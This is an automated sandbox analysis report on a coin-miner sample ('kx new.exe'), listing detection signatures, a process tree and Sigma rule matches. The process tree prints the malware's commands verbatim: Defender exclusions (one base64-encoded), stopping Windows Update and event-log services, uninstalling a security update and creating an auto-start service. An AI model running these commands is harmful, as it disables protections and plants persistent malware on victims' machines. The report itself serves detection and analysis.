Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
kx new.exe

Overview

General Information

Sample name:kx new.exe
Analysis ID:1585415
MD5:d9d13fa25e880665fb471a4be57c494c
SHA1:7a4c1b09a9d37ff55872544a39a2cc5f0eec9523
SHA256:632e973ab369d51e21b499e440bdd9c4b2ffaac9e435485a648de8724e1b19f7
Tags:CoinMinerexeuser-aachum
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Encrypted powershell cmdline option found
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs new ROOT certificates
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses powercfg.exe to modify the power settings
Writes to foreign memory regions
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Uncommon Svchost Parent Process
Stores large binary data to the registry
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • kx new.exe (PID: 7428 cmdline: "C:\Users\user\Desktop\kx new.exe" MD5: D9D13FA25E880665FB471A4BE57C494C)
    • powershell.exe (PID: 7512 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcAB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAcAB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AagBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAbgBxACMAPgA=" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Kawpow new.exe (PID: 7556 cmdline: "C:\Users\user\AppData\Local\Temp\Kawpow new.exe" MD5: FB6A3B436E9F9402937D95F755B62F91)
      • powershell.exe (PID: 7644 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 8068 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • wusa.exe (PID: 1148 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
      • sc.exe (PID: 8076 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 8100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 1304 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 1296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 3340 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 1736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 1984 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 5652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 2508 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 3700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 3712 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 4924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 3872 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 6860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 4524 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 7248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 6908 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 7116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • dialer.exe (PID: 4032 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
        • winlogon.exe (PID: 556 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
        • lsass.exe (PID: 640 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
        • svchost.exe (PID: 920 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • dwm.exe (PID: 984 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
      • sc.exe (PID: 3068 cmdline: C:\Windows\system32\sc.exe delete "CKTJZLMO" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 6756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7684 cmdline: C:\Windows\system32\sc.exe create "CKTJZLMO" binpath= "C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7472 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7436 cmdline: C:\Windows\system32\sc.exe start "CKTJZLMO" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • xmr new.exe (PID: 7672 cmdline: "C:\Users\user\AppData\Local\Temp\xmr new.exe" MD5: 7D6398EBFB82A24748617189BF4AD691)
      • powershell.exe (PID: 7736 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 7796 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • cmd.exe (PID: 8092 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • wusa.exe (PID: 768 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
      • sc.exe (PID: 8108 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 8136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 1568 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 3636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 2168 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 1976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 2288 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 2352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 3020 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 2940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 3404 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 6780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 1012 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 6600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 3500 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 6720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 5216 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 7108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • dialer.exe (PID: 2788 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
      • sc.exe (PID: 7180 cmdline: C:\Windows\system32\sc.exe delete "CKTJZLMO" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7628 cmdline: C:\Windows\system32\sc.exe create "CKTJZLMO" binpath= "C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7588 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7536 cmdline: C:\Windows\system32\sc.exe start "CKTJZLMO" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • eejhedztifcv.exe (PID: 7604 cmdline: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe MD5: 7D6398EBFB82A24748617189BF4AD691)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Change of critical system settings

barindex
Sigma detected: Disable power options
Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Kawpow new.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Kawpow new.exe, ParentProcessId: 7556, ParentProcessName: Kawpow new.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 3712, ProcessName: powercfg.exe

System Summary

barindex
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcAB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAcAB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AagBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAbgBxACMAPgA=", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcAB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAcAB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AagBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAbgBxACMAPgA=", CommandLine|base64offset|contains: Ijw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\kx new.exe", ParentImage: C:\Users\user\Desktop\kx new.exe, ParentProcessId: 7428, ParentProcessName: kx new.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcAB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAcAB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AagBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAbgBxACMAPgA=", ProcessId: 7512, ProcessName: powershell.exe
Sigma detected: Powershell Defender Exclusion
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Kawpow new.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Kawpow new.exe, ParentProcessId: 7556, ParentProcessName: Kawpow new.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7644, ProcessName: powershell.exe
Sigma detected: Suspicious Execution of Powershell with Base64
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcAB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAcAB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AagBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAbgBxACMAPgA=", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcAB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAcAB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AagBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAbgBxACMAPgA=", CommandLine|base64offset|contains: Ijw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\kx new.exe", ParentImage: C:\Users\user\Desktop\kx new.exe, ParentProcessId: 7428, ParentProcessName: kx new.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcAB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAcAB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AagBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAbgBxACMAPgA=", ProcessId: 7512, ProcessName: powershell.exe
Sigma detected: Uncommon Svchost Parent Process
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\system32\dialer.exe, ParentImage: C:\Windows\System32\dialer.exe, ParentProcessId: 4032, ParentProcessName: dialer.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 920, ProcessName: svchost.exe
Sigma detected: New Service Creation Using Sc.EXE
Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\sc.exe create "CKTJZLMO" binpath= "C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "CKTJZLMO" binpath= "C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Kawpow new.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Kawpow new.exe, ParentProcessId: 7556, ParentProcessName: Kawpow new.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "CKTJZLMO" binpath= "C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe" start= "auto", ProcessId: 7684, ProcessName: sc.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcAB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAcAB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AagBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAbgBxACMAPgA=", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcAB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAcAB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AagBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAbgBxACMAPgA=", CommandLine|base64offset|contains: Ijw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\kx new.exe", ParentImage: C:\Users\user\Desktop\kx new.exe, ParentProcessId: 7428, ParentProcessName: kx new.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcAB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAcAB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AagBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAbgBxACMAPgA=", ProcessId: 7512, ProcessName: powershell.exe

HIPS / PFW / Operating System Protection Evasion

barindex
Sigma detected: Stop EventLog
Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Kawpow new.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Kawpow new.exe, ParentProcessId: 7556, ParentProcessName: Kawpow new.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 7472, ProcessName: sc.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: kx new.exeAvira: detected
Multi AV Scanner detection for dropped file
Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeReversingLabs: Detection: 73%
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeReversingLabs: Detection: 73%
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeReversingLabs: Detection: 73%
Multi AV Scanner detection for submitted file
Source: kx new.exeReversingLabs: Detection: 71%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: kx new.exeJoe Sandbox ML: detected
Source: kx new.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: Binary string: T].PdBB?0_$u3J~7 source: kx new.exe, 00000000.00000002.1446358805.0000000000402000.00000002.00000001.01000000.00000003.sdmp, kx new.exe, 00000000.00000001.1426821105.0000000000402000.00000002.00000001.01000000.00000003.sdmp
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 10_2_000002534CF9DCE0 FindFirstFileExW,10_2_000002534CF9DCE0
Source: C:\Windows\System32\winlogon.exeCode function: 59_2_000002E99175DCE0 FindFirstFileExW,59_2_000002E99175DCE0
Source: C:\Windows\System32\lsass.exeCode function: 73_2_00000213BDCEDCE0 FindFirstFileExW,73_2_00000213BDCEDCE0
Source: C:\Windows\System32\svchost.exeCode function: 74_2_00000158709DDCE0 FindFirstFileExW,74_2_00000158709DDCE0
Source: C:\Windows\System32\dwm.exeCode function: 75_2_0000026DB167DCE0 FindFirstFileExW,75_2_0000026DB167DCE0
Source: powershell.exe, 00000002.00000002.1493135333.000000000870A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoftT
Source: powershell.exe, 00000002.00000002.1469378099.0000000005185000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1469378099.0000000005185000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000002.00000002.1469378099.0000000005031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.1469378099.0000000005185000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000002.00000002.1469378099.0000000005185000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
